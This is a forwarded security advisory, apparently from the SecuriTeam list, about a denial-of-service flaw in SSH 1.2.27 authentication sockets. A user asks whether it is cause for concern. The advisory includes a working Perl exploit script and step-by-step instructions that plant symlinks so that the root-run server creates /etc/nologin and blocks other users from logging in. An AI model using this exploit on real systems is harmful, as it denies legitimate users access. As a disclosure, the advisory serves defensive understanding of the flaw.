ssh_exploit.txt

`I recieved this email today and wanted to know if it is something to be of  
concern about.  
  
  
  
The following security advisory is sent to the securiteam mailing list, and  
can be found at the SecuriTeam web site: http://www.securiteam.com  
  
SSH 1.2.27 vulnerable to a Denial of Service attack  
  
------------------------------------------------------------  
  
SSH has the option of setting up "authentication sockets", used to pass  
authentication keys securely. When this is used, a socket is created on both  
client and server machines; the socket created on the server uses an easy to  
guess filename (based on the PID). The creation of this socket is done while  
the server is acting as root and follows symlinks.  
  
  
******************************  
  
Exploit:  
  
- connect to remote machine  
- run the following script (creates symlinks for the next 50 PID's):  
  
----- cut -----  
#!/usr/bin/perl  
  
$pid = $$;  
  
$whoami = `whoami`;  
chop($whoami);  
mkdir("/tmp/ssh-$whoami", 0700);  
  
for ($i = $pid; $i < $pid+50; $i++)  
{  
symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");  
}  
----- cut -----  
  
  
- on local machine, execute ssh-agent1; it will produce a few lines to cut and paste into your shell.  
  
- ssh1 to the remote machine; enter password  
  
The socket will have been created at /etc/nologin, preventing other non-root users from logging in. This connection too will die with "Logins are currently denied by /etc/nologin:"  
  
This was tested on a RedHat 6.0 machine, with standard configure/make/install installation of ssh. This script should work pretty well for systems that create processes where each PID is one greater than the last; other platforms may require modifications, or many-many more links, if they're exploitable.  
  
  
  
  
`